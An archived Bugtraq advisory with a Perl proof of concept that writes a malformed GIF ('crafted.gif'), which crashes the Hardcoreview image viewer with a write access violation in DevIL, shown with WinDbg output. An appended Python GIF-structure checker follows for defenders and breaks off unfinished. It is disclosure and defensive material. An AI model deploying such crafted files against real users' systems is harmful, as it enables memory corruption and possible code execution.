Bugtraq mailing list archives

Hardcoreview WriteAV Arbitrary Code Execution
From: pereira () secbiz de
Date: Fri, 5 Oct 2012 09:20:36 GMT

#!/usr/bin/perl
 
# Hardcoreview WriteAV Arbitrary Code Execution
 
# Author: Jean Pascal Pereira <pereira () secbiz de>
 
# Vendor URI: http://sourceforge.net/projects/hardcoreview/
 
# Vendor Description:
# Image browser. Designed and created for professional and amateur watching image files.
# All kinds of image files ;). Supports *.jpg, *.gif, *.bmp, *.psd, and many more.
 
# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\hardcoreview\hardcoreview.exe" C:\research\hcview\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path.           *
# * Use .symfix to have the debugger choose a symbol path.                   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is: 
# ModLoad: 00400000 00443000   hardcoreview.exe
# ModLoad: 7c900000 7c9b2000   ntdll.dll
# ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 5ed00000 5edcc000   C:\WINDOWS\system32\OPENGL32.dll
# ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 68b20000 68b40000   C:\WINDOWS\system32\GLU32.dll
# ModLoad: 73760000 737ab000   C:\WINDOWS\system32\DDRAW.dll
# ModLoad: 73bc0000 73bc6000   C:\WINDOWS\system32\DCIMAN32.dll
# ModLoad: 10000000 102be000   C:\Program Files\hardcoreview\DevIL.dll
# ModLoad: 7c420000 7c4a7000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll
# ModLoad: 78130000 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll
# ModLoad: 00350000 00365000   C:\Program Files\hardcoreview\ILU.dll
# ModLoad: 00380000 0038f000   C:\Program Files\hardcoreview\ILUT.dll
# ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 5d090000 5d12a000   C:\WINDOWS\system32\COMCTL32.dll
# ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 003a0000 003b5000   C:\Program Files\hardcoreview\pthreadVC2.dll
# ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
# ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 78480000 7850e000   C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll
# ModLoad: 78520000 785c3000   C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll
# (e4c.8c8): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 01620000 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 61dd0000 61dd6000   C:\WINDOWS\system32\MCD32.DLL
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
# (e4c.8c8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0         nv up ei ng nz ac pe cy
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:d9f3d1b1=????????
# 0:000> g;r;!exploitable -v;q
# (e4c.8c8): Access violation - code c0000005 (!!! second chance !!!)
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0         nv up ei ng nz ac pe cy
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:d9f3d1b1=????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll - 
# *** WARNING: Unable to verify checksum for C:\Program Files\hardcoreview\DevIL.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\hardcoreview\DevIL.dll - 
# *** ERROR: Module load completed but symbols could not be loaded for hardcoreview.exe
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - 
# Exception Faulting Address: 0xffffffffd9f3d1b1
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation

# Exception Hash (Major/Minor): 0x69293f33.0x12365f02

# Stack Trace:
# ntdll!wcsncpy+0x374
# MSVCR80!free+0xcd
# DevIL!icalloc+0x49
# DevIL!ilDxtcDataToImage+0x2e7f
# DevIL!ilDxtcDataToImage+0x308c
# DevIL!ilDxtcDataToImage+0x30e4
# hardcoreview+0x41ba
# kernel32!RegisterWaitForInputIdle+0x49
# Instruction Address: 0x000000007c9108f3

# Proof of Concept:
 
my $crafted =

"\x47\x49\x46\x38\x39\x61\x32\x00\x32\x00\xF7\x00\x00\x00\x00\x00".
"\xFF\xFF\xFF\xE0\x29\x3F\x6F\x2D\x30\xB9\x78\x7A\xD9\x45\x4C\xA4".
"\x82\x84\xE6\x26\x35\xE8\x27\x39\xE6\x29\x3A\xD3\x2C\x3B\xDD\x30".
"\x40\xDE\x34\x43\x6A\x1C\x23\x5B\x19\x1F\xE6\x27\x3B\xE6\x29\x3D".
"\xE2\x28\x3D\xE8\x2A\x3E\xE6\x2A\x40\xE1\x29\x3D\xE0\x29\x3B\xEE".
"\x2C\x40\xE4\x2A\x3F\xE2\x2A\x3F\xDF\x29\x3D\xEA\x2C\x42\xE0\x2A".
"\x3F\xE0\x2A\x3D\xDF\x2A\x3D\xDF\x2A\x3F\xDE\x2A\x3B\xD9\x29\x3A".
"\xE5\x2C\x41\xE4\x2D\x3F\xDC\x2B\x3F\xDB\x2C\x3E\xE2\x2E\x42\xDD".
"\x2D\x3E\x7A\x1C\x27\x2D\x0F\x12\x2A\x16\x18\xE1\x21\x3B\xE3\x23".
"\x3D\xE3\x25\x3D\xE6\x26\x3E\xE5\x26\x40\xDE\x25\x3B\xE3\x27\x3F".
"\xED\x29\x42\xE2\x27\x3D\xE1\x27\x3D\xED\x2A\x45\xE2\x28\x3E\xE1".
"\x28\x3F\xD7\x26\x3B\xE9\x2A\x41\xE2\x29\x40\xE1\x29\x3F\xE0\x29".
"\x40\xE8\x2B\x44\xDF\x29\x40\xDF\x29\x3F\xDD\x29\x40\xD4\x27\x3F".
"\xE3\x2B\x43\xE0\x2A\x40\xDA\x29\x3F\xE9\x2D\x47\xE3\x2C\x45\xE6".
"\x2D\x45\xDF\x2C\x44\xDB\x2B\x40\xC9\x28\x3C\xE4\x2F\x48\xDC\x2D".
"\x44\xD2\x2C\x43\xC6\x2B\x3F\xAA\x27\x39\x2C\x0A\x0E\x8F\x21\x2E".
"\x91\x2B\x38\x4A\x1B\x21\xE9\x26\x42\xE1\x27\x42\xEC\x2A\x47\xDF".
"\x28\x42\xDC\x2F\x49\xD0\x30\x49\xD0\x31\x4A\xED\xA9\xB3\xCC\x31".
"\x4D\xC8\x34\x4F\xC7\x34\x4F\x8D\x71\x76\xC9\x32\x4F\xCF\x35\x53".
"\xC7\x34\x51\xC2\x37\x53\x3B\x19\x20\xBB\x3A\x57\x2B\x20\x23\xAF".
"\x40\x60\x14\x0E\x10\xC6\x95\xA6\x24\x1C\x1F\x22\x14\x1A\x18\x11".
"\x14\x88\x41\x63\xBF\x96\xAC\x1F\x1A\x1D\x0D\x04\x0C\x1A\x16\x1A".
"\x17\x15\x18\x8B\x81\x90\x25\x23\x27\x1B\x19\x22\x0F\x0E\x17\x7F".
"\x7C\x9B\x88\x8E\xBE\x73\x82\xBD\x4C\x55\x79\x91\xA6\xF3\x84\x95".
"\xCB\x63\x74\x9F\xD1\xDB\xF4\xBB\xC0\xCC\x53\x64\x8B\x8D\xA9\xE9".
"\x37\x4A\x71\x8D\xAE\xF4\x86\xA3\xDE\xD6\xE3\xFE\x93\xB6\xF6\x8B".
"\xB3\xF5\x8B\xAF\xEC\x23\x31\x46\x11\x1C\x1E\x0F\x12\x12\x09\x14".
"\x0E\x0D\x0B\x06\x07\x06\x04\x17\x12\x0C\xD2\xAC\x87\x0D\x0C\x0B".
"\x15\x14\x13\xBE\x92\x6D\xD0\xA4\x83\xD0\xA0\x7E\x27\x1E\x18\xCA".
"\x9D\x7F\x89\x5D\x40\x95\x67\x4B\xAC\x7B\x5B\xA1\x72\x55\xB7\x86".
"\x68\xC4\x93\x74\xD1\xA5\x89\x41\x2D\x21\x8C\x64\x4E\xCE\x97\x79".
"\xBC\x8C\x71\xDB\xA4\x85\xE0\xA9\x8B\xC3\x95\x7B\xB1\x89\x72\xD2".
"\xA3\x88\xDA\xAB\x8F\xCE\xA0\x87\xBB\x92\x7A\x1A\x15\x12\x1E\x16".
"\x12\xD1\x9A\x7F\x9A\x74\x61\xD8\xA4\x8A\xC7\x98\x7F\x53\x3F\x35".
"\xD8\xA6\x8D\x9B\x7F\x71\xC1\xA3\x94\x4E\x33\x26\x6D\x49\x39\x7C".
"\x53\x41\xCC\x94\x7B\xC3\x8E\x76\xD4\x9E\x85\xE3\xAD\x94\xCC\x9B".
"\x85\xC2\x99\x85\xCA\xA0\x8D\xD5\xA9\x95\xC3\x9E\x8D\xB5\x94\x85".
"\xEB\xD8\xCF\x24\x15\x0F\xC1\x86\x6E\xB4\x7D\x67\xCD\x90\x77\xA6".
"\x76\x63\xD8\x9C\x83\xDC\xA2\x8A\xD7\xA0\x88\xAA\x7E\x6B\xD5\xA2".
"\x8E\xD3\xA1\x8D\xDA\xA9\x94\xE3\xB1\x9C\xDE\xAC\x98\xBE\x93\x82".
"\xE6\xB6\xA3\xBF\x98\x88\xCE\x95\x81\xC6\x94\x81\xDB\xA5\x91\xD4".
"\xA5\x94\xB1\x8B\x7D\xA9\x85\x77\xE0\xB7\xA7\x60\x40\x36\xBB\x83".
"\x70\xD4\x9D\x8A\xB2\x83\x74\x90\x6B\x5F\xB9\x8B\x7C\x6D\x53\x4A".
"\x35\x21\x1B\xC3\x9E\x94\x7F\x61\x59\xA3\x80\x77\xD2\xA9\x9F\xCA".
"\xA3\x99\x23\x15\x12\x1E\x19\x18\xDE\xCA\xC6\x30\x15\x10\x16\x0A".
"\x08\xDC\x8E\x80\x39\x27\x24\xD2\x79\x6B\xDC\x85\x77\x19\x12\x11".
"\xD3\xA0\x98\x2F\x1D\x1B\xED\xBC\xB6\xAB\x4F\x47\x24\x18\x17\xBB".
"\x95\x92\xAD\x6E\x6A\xD9\x5C\x5C\xB7\x6A\x69\x1E\x16\x16\x19\x15".
"\x15\x2E\x28\x28\x08\x07\x07\xA8\xA5\xA5\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\xFF\x00\x2C\x00\x4B\x00\x00\x32\x00\x32\x00\x00\x08".
"\xFF\x00\x03\x08\x1C\x48\xB0\xA0\xC1\x83\x08\x13\x2A\x5C\xC8\xB0".
"\x21\x43\x32\x5F\xB8\x48\x9C\x38\xF1\xCB\x97\x2E\x5F\xB6\x5C\x0C".
"\xC3\x65\x8B\x46\x8B\x5D\x30\x5A\x1C\x79\xB1\x0B\x45\x89\x5B\xCC".
"\x18\x64\x22\xA0\xA5\xCB\x97\x02\x32\x64\x40\x82\x84\x4A\x8E\x0A".
"\x0F\x20\x98\x88\x00\xA1\xC3\x87\x08\x35\x90\x8C\xF0\x30\xD4\x86".
"\x0D\x1D\x30\x5B\x86\x31\x88\x25\xE9\x4B\x0F\x1E\x5C\xB4\xB0\xD1".
"\xC3\x46\x08\x1E\x41\x96\x14\x31\x42\x84\xC6\x04\x0A\x32\x6A\xF8".
"\xF0\x31\x62\x04\x0C\xA4\x49\xC5\x30\x75\xDA\x52\x47\x8F\x1F\x3A".
"\x28\x54\x90\x40\xC4\x49\x03\x07\x78\x1B\x9C\x70\xC2\x84\xC8\x04".
"\x19\x30\x5C\x10\x15\x80\x16\xA6\xDA\x82\x4D\xD9\xFA\x80\x61\x63".
"\x04\x8F\x2A\x4D\x4E\x3C\x61\x04\x69\x1D\x24\x46\xEB\xD6\xA9\x6B".
"\xD0\x44\x49\x88\x16\x35\x46\xD8\xA8\xE1\xF4\x30\xC1\xC4\x30\x75".
"\x78\x88\x09\xA1\xAE\x03\x14\xEB\x1C\xC5\x39\xB3\x46\x55\xA4\x35".
"\x91\x16\x31\x42\x71\x82\x49\x15\x18\x19\x60\x90\x4E\xBB\xD6\x65".
"\x0D\x0A\x3F\x6A\x74\xE8\x30\xC5\xC8\x09\x47\x67\xCE\x38\x82\x87".
"\x1B\x9E\xA3\x48\x71\xE2\xA8\x82\xA7\x08\xD2\x18\x27\x26\x12\xF4".
"\xFF\xE8\x51\xDA\x60\x96\x97\x14\x32\xEC\xD0\x21\x03\xC7\x95\x06".
"\x8C\x1A\xAD\x93\xE7\x49\x9E\x3E\x7D\xB6\x23\x4D\x57\xC5\x3F\xB7".
"\x23\x28\x55\x50\x40\x42\x79\x05\x9D\xE7\x92\x07\x1D\xC0\x20\x00".
"\x0C\x55\x34\x00\xC9\x1B\xEB\xD0\x52\x4B\x2D\x9E\x08\xB3\xCA\x2A".
"\xF0\xC0\xA3\xCA\x3E\x91\xC0\x73\x1F\x3A\xF7\x39\x61\xC1\x07\x04".
"\x12\x64\xA0\x4B\x3E\x78\x10\x01\x11\x50\xAC\xD3\xCF\x3A\xB6\x60".
"\x72\xC9\x25\xDA\x78\x62\x63\x38\xF5\xEC\x93\x1D\x3C\xE7\x54\xB2".
"\x8A\x1A\x89\x84\xD3\x84\x04\x25\x0E\x74\xA2\x00\x36\x08\x30\xC2".
"\x04\x4D\x08\x53\x59\x2D\x99\x64\xA2\x89\x26\x98\xD8\x52\x8B\x95".
"\xB4\xE0\xB8\x8F\x3E\xAB\xB4\xD3\xCE\x2A\x71\xB8\x31\x40\x10\x17".
"\x10\x57\xE0\x53\x61\x39\xC7\xC8\x1B\xB4\x44\x99\x09\x31\x6E\xCE".
"\xA8\xC9\x27\x14\xD6\x83\x4E\x19\xE1\xD4\x08\x0F\x1D\xFC\x38\xA1".
"\x81\x07\x49\xDA\xB0\x9A\x69\x46\xC2\x44\x81\x08\x49\xA8\x03\x89".
"\x30\x9F\x6C\xB2\xC9\x30\x8E\x46\xAA\x89\xA3\x99\x5C\x42\x4B\x3D".
"\x5E\x6A\xF3\x49\x38\x6E\xCC\x31\x40\x09\x1F\x50\xC1\x41\x0D\x83".
"\x9A\x07\x13\x06\x46\xB4\x08\x49\x3B\xCA\x84\xE2\x2A\x27\x9C\x0C".
"\xFF\x23\x09\x2E\xA1\xE0\x72\x0B\x29\xA1\x7C\x42\x0B\x3F\xB0\xD0".
"\xD2\x4A\x2D\x70\xCC\xD1\x4E\x12\x13\x58\xD1\x41\x0D\x3B\x08\x40".
"\xA8\x40\x47\xDA\x20\xC4\x11\x0E\x28\x72\x06\x2D\xDD\xE0\x82\x0B".
"\x29\x9C\x14\xA3\xED\x2D\xAC\xB0\x02\x0A\x28\xD6\x62\xE2\x09\x2C".
"\xDA\xD8\x02\x4E\x24\x73\xCC\x11\x05\x0D\x54\xA4\x47\xDE\xB2\x01".
"\x1C\xA9\x03\x06\x40\x84\x03\xC7\xB4\xA5\xA4\xF2\x0A\x35\xDC\xDE".
"\x72\xCB\x34\xB9\xE4\xC2\xCA\xBE\xB7\xE0\xF2\x09\x2C\x9F\xD8\x02".
"\x8B\x23\x9D\x0E\xC0\xC3\x14\x15\xA4\xA8\xAC\xA9\x2F\x5D\xC0\x44".
"\x3B\x74\x44\x02\x4B\x2A\xA9\x28\x83\x8D\x34\xD6\x54\xB3\x4C\x32".
"\xDC\x30\xB3\x0C\x37\xC9\x30\xD3\x0B\x34\xDE\x68\x92\x89\x36\xF0".
"\x34\x1C\x83\x10\x1F\xB8\x90\x2C\xBC\x47\x66\x00\x41\x12\xED\xA4".
"\x01\x0F\x38\xD3\xB4\x02\x0E\x38\xE3\xC8\xC2\xCB\x32\xCF\x3C\xD3".
"\x4C\x33\xCF\x58\x03\x8C\x2C\xB2\x78\x63\x8C\x24\xB6\xC0\x91\x86".
"\xBA\x31\x90\x40\x82\x0B\x0A\xE2\xFC\xD2\x0E\x13\x28\x30\x46\x1A".
"\x8E\xD8\x82\x4B\x2B\xE4\x78\x31\xCE\x38\xAD\xA4\xC2\x4D\x35\xD5".
"\xC4\xB2\x8B\x2C\xE3\x0C\xCD\x36\xD5\xAA\xA4\xE1\x46\x14\x25\x3C".
"\xFF\x30\x02\x92\x13\x9F\xE9\x92\x0D\x13\x30\x31\x06\x1D\xF0\x8C".
"\xC3\x8B\x34\xE6\xF4\xE2\x38\x34\xAF\xB0\x72\x4C\x32\xB9\x50\x93".
"\x2F\x35\xD0\x5C\x93\x0A\x27\xB6\xC4\x8C\x4E\x14\x46\xB4\x30\x42".
"\x07\x2D\x79\x6D\x1C\x04\x4D\x8C\x71\x5F\x2D\xDB\x7C\x73\x0D\x39".
"\xE3\x78\xF3\xCD\x37\xD0\xA0\x22\xB2\x24\xDF\x60\x23\xCB\x35\xC0".
"\xA4\x62\x89\x2D\x6B\xAC\xB1\x0F\xE8\x36\x73\x50\x3A\xC5\x2D\xD5".
"\xB0\xF3\x00\xE0\x9C\x63\xCB\x27\xDE\x18\xE0\x0D\x38\xDA\x90\x63".
"\x0F\x30\xAD\x74\x83\x0D\x39\xDD\xD4\x02\x8B\x17\x6D\x5C\xE3\x8D".
"\x36\x95\xA8\xB3\x8A\x13\x25\xCC\x60\x43\x04\x14\x04\x6E\x22\x4C".
"\x39\x80\x40\x8F\x31\x29\xB4\xE2\x8B\x39\xE6\x88\x23\xCD\x37\xDD".
"\x5C\x83\x0D\x26\x92\x88\x9E\x31\xD0\x66\x0F\x34\x48\x23\x15\x07".
"\xC3\x04\x2D\x92\x50\x01\x01\x58\xE1\x38\xEE\x2B\xD4\x4B\x7A\x50".
"\x01\x7A\x0C\x43\x1B\xC6\x70\x45\x3C\xCA\xE1\x8C\x66\xEC\xE2\x16".
"\xDF\x68\x45\x28\x46\xA1\x0C\x65\x94\x82\x1A\xB1\x70\x45\x33\xAA".
"\x71\x8A\x97\x19\x83\x1E\x37\x80\x40\x0D\x7A\x40\xBA\x08\x32\xEB".
"\x25\x46\xA1\x40\x01\x8A\x51\x0B\x65\xB8\xC2\x17\xD9\xC8\x86\x35".
"\xFF\x76\x81\x0A\x54\xBC\x22\x16\xBA\xA0\x04\x35\x48\x91\x8A\x5D".
"\xC4\xC2\x19\xB1\x10\x05\x31\x6A\xA1\x89\x02\x0C\xC1\x06\x67\x19".
"\x8B\x0D\xE3\x85\xC3\x1C\xCC\x80\x01\xEE\xB0\x05\x31\x62\x11\x8D".
"\x79\x64\xA3\x19\xB1\x48\xDA\x32\x9A\xA1\x0B\x64\x98\x62\x19\xBB".
"\x60\xC6\x33\xA2\xA1\x0B\x51\x18\xC3\x16\xEE\x30\x01\x16\x73\xB0".
"\xA0\x24\x99\xCE\x25\x23\x68\xC1\x0B\xF0\x41\x8A\x61\x2C\xC3\x19".
"\x41\x74\x86\x2E\xAA\xC1\x0D\x6E\xB0\x11\x19\xAC\x70\xE4\x1C\xA3".
"\x31\x0A\x29\x0E\x03\x1F\x2A\x70\x01\x06\xA0\xC2\x98\x2D\x1E\x89".
"\x28\x30\x78\x41\x01\x90\x71\x8B\x5D\x4C\xD2\x19\xC9\xD8\x06\x37".
"\x9C\x11\x8D\x56\x22\x63\x1B\xD3\x78\x86\x33\x9C\x31\x0A\x50\x14".
"\xE3\x1D\x26\x50\x41\x92\xCA\x72\x14\x4F\xBE\x24\x03\x11\xD8\xC1".
"\x0F\x66\xF0\x8E\x5D\xB0\x82\x69\x8A\x2C\x06\x2C\x09\xB0\x0B\x6E".
"\xE0\x62\x1A\xD3\xD8\x46\x35\x74\x31\x0A\x57\x80\x82\x12\xF8\x78".
"\x81\x07\x74\xD0\xC9\x1A\x20\xE5\x8F\x48\x52\xD0\x0E\x06\xC9\x0E".
"\x56\x24\x03\x19\xA7\x38\x86\xC9\xBA\x61\x0C\xDA\x29\xE3\x1B\xCD".
"\x00\x98\x28\x8E\x91\x0B\x50\x88\x02\x93\x1B\x10\x40\x0D\x6A\x60".
"\xFF\x94\xE3\x09\xAE\x2D\x8D\xD1\x41\x0D\x6E\x80\x8F\x5D\xE4\xE2".
"\x18\xA6\xD8\x45\xFE\xEC\x21\x0E\xFC\xE9\xEF\x17\xBB\x20\x85\xB7".
"\x28\x51\x0C\x7C\x84\xC0\x07\x6C\x01\x67\x4B\xFE\xE6\x02\x15\x14".
"\x80\x15\x93\x98\x04\x2A\xA4\xF1\x8B\x59\x94\x23\x1E\x28\x2D\x87".
"\x39\x7E\xC1\x0B\x89\x52\x62\x12\xEF\xF8\xC0\x0B\x46\xC0\x47\x33".
"\xBD\x6F\x70\x30\x20\x4B\x0E\x56\xC0\x80\x62\x84\x74\x17\x99\xEB".
"\x86\x32\xF2\x41\xD4\x7B\x10\xA0\x1B\xA5\x80\xC6\x24\x8E\x31\x09".
"\x77\xB0\xE0\x07\x5C\x2B\xD2\x0D\x5F\x92\xC5\x11\x64\xE0\x05\xEE".
"\xE8\x84\x25\xF6\xF5\x0D\x02\x78\x35\x1F\xE9\x08\x40\x3A\xBA\x11".
"\xD6\x60\x50\x82\x12\xF3\x30\x88\x16\xB4\x10\x00\x2D\xF8\x12\x45".
"\x8B\x11\x4B\x0F\x56\xF0\xD1\x64\x58\x22\x8E\xCC\x08\xC6\x40\x00".
"\xB0\x57\x82\x00\xE0\xAF\x80\x15\x08\x5F\xDB\x8A\xBC\x96\xAC\xEF".
"\x01\x2D\xA0\x02\x0C\x86\x40\x00\x54\x4C\xA2\x13\x22\x0D\x00\x60".
"\x27\x3B\x59\xC9\x4A\x96\xAF\x98\x0D\x6C\x61\x05\xE0\x83\x1F\x0C".
"\x01\x09\x02\x38\x00\x18\x0C\xF0\x0A\x50\xAC\xD1\x17\x7A\x15\xAC".
"\x6A\xFD\x7A\x59\xCB\x0E\x76\xB0\xFF\x24\x0C\x0C\xAC\x40\x05\x2A".
"\xFF\x48\x00\x01\x6C\x90\x03\x25\x48\x01\x0D\x6B\xA0\x76\xB5\x94".
"\x15\x6C\x70\xFF\x6A\xD9\xE2\x08\x40\x08\x3B\x18\xC1\x07\x12\xA0".
"\x01\x26\x9C\x20\x0F\x77\xB8\xC6\x23\x38\x06\x0C\xD7\x16\xD7\xB2".
"\x7D\x70\x2D\x66\xB5\x7B\x10\xD4\x70\x36\x07\x31\x10\x81\x13\xC6".
"\x50\x07\x3E\xE8\xC1\x0E\xA4\xA8\x06\x2F\x4A\x11\x56\xE2\x5A\xB7".
"\x0F\x85\xE0\xEE\x76\x05\xC2\xD6\x82\xB0\xC4\x07\x35\x98\x80\x06".
"\x96\xE0\x04\x07\xE4\x08\x0E\x78\x38\xC4\x20\xEC\x90\x8A\x58\x74".
"\x82\x17\xED\xED\x2B\x6C\x29\x9B\x59\xF7\x16\x04\x08\x24\xB8\x00".
"\x0D\x98\x10\x05\x29\xA4\xC0\x0D\x74\xD8\x07\x1D\xF0\x00\x08\x01".
"\xDB\xC1\x00\xA8\xD0\x2B\x71\x19\xBC\xDD\x11\xB3\xD6\x20\x0A\x68".
"\x6E\x85\xEB\x91\x86\x16\xBB\x01\x0E\xE5\x3D\x04\x20\x04\x01\x08".
"\x3B\xC8\xC2\xBA\xC5\x5D\x70\x6B\x19\x7C\x10\x27\x40\x41\x0A\xF2".
"\xE8\x54\x19\xF8\xD1\x62\x18\xFF\x81\xC6\x87\x30\x84\x21\xF6\xE0".
"\x07\xD5\x66\x77\xBB\x80\x90\xEF\x89\x0B\x32\x86\x32\xD0\xA1\x0C".
"\x69\xE0\x87\x96\xF9\xF1\xE2\x3A\x04\x82\xC6\x1D\x2E\x44\x21\xF6".
"\x20\x07\xCB\x16\xE2\xC9\x7C\xC5\x83\x75\xDD\x4B\x5C\x7F\x18\x24".
"\x33\xCB\x2D\x1E\xF2\x96\x5F\x1C\x09\x44\x0C\x02\x10\x33\x16\x73".
"\x21\xFE\xD0\x64\x42\x14\xE2\x10\xD9\x0D\x00\x21\xFE\xE0\xE6\x42".
"\x0B\xC4\x1F\x6E\x0E\x80\x3F\xCA\xE0\x90\x46\x3B\xFA\xD1\x90\x8E".
"\x34\x41\x02\x02\x00\x3B";

open(C, ">:raw", "crafted.gif");
print C $crafted;
close(C);
 
# http://0xffe4.org
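As an added defender-side check (not part of the advisory, nor code from Hardcoreview or DevIL), the Python below walks a GIF's block structure and reports any image descriptor that does not fit inside the logical screen, which is the kind of bounds check a loader should apply before allocating or writing pixel data. The embedded sample is constructed: it reproduces only the structural fields readable in the $crafted string above (GIF89a, a 50x50 screen, packed byte 0xF7, the Graphic Control Extension, and an image descriptor whose left-position bytes are 00 4B) with placeholder colour-table and LZW bytes; the advisory does not name the root cause, so the mismatch the check reports is a structural observation, not a confirmed trigger.

```python
"""Structural sanity check: do a GIF's image descriptors fit its logical screen?

Added example for this advisory; the sample data is constructed, not the PoC payload."""
import struct
import sys

# Fields read off the advisory's $crafted string: GIF89a, 50x50 logical screen,
# packed byte 0xF7 (global colour table, 256 entries), and an image descriptor
# whose left-position bytes are 00 4B, i.e. 0x4B00 = 19200 pixels.
POC_SCREEN = (50, 50)
POC_IMAGE_LEFT = 0x4B00


def skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed sub-blocks ending in a 0x00 byte."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def parse_gif(data: bytes) -> dict:
    """Walk header, logical screen descriptor, extensions and image descriptors.

    Returns the screen size, every image descriptor as (left, top, w, h), and
    one finding string for each image that extends past the logical screen."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    width, height, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    pos = 13
    if packed & 0x80:                          # global colour table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    images, findings = [], []
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:                        # trailer
            break
        if tag == 0x21:                        # extension: introducer, label, sub-blocks
            pos = skip_sub_blocks(data, pos + 2)
        elif tag == 0x2C:                      # image descriptor
            if pos + 11 > len(data):
                raise ValueError("truncated image descriptor")
            left, top, w, h, ipacked = struct.unpack_from("<HHHHB", data, pos + 1)
            pos += 10
            if ipacked & 0x80:                 # local colour table present
                pos += 3 * (2 ** ((ipacked & 0x07) + 1))
            pos += 1                           # LZW minimum code size
            pos = skip_sub_blocks(data, pos)
            images.append((left, top, w, h))
            if left + w > width or top + h > height:
                findings.append(f"image {left},{top} {w}x{h} exceeds {width}x{height} screen")
        else:
            raise ValueError(f"unknown block tag 0x{tag:02x} at offset {pos}")
    return {"screen": (width, height), "images": images, "findings": findings}


def build_gif(left: int) -> bytes:
    """Constructed sample with the PoC's structural fields and placeholder payload bytes."""
    gct = bytes(range(256)) * 3                               # 768 placeholder bytes
    out = b"GIF89a" + struct.pack("<HHBBB", *POC_SCREEN, 0xF7, 0, 0) + gct
    out += b"\x21\xF9\x04\x01\x00\x00\xFF\x00"               # graphic control extension
    out += b"\x2C" + struct.pack("<HHHHB", left, 0, 50, 50, 0) + b"\x08"
    out += b"\x04\x00\x01\x02\x03\x00"                        # one 4-byte LZW sub-block, terminator
    return out + b"\x3B"


if __name__ == "__main__":
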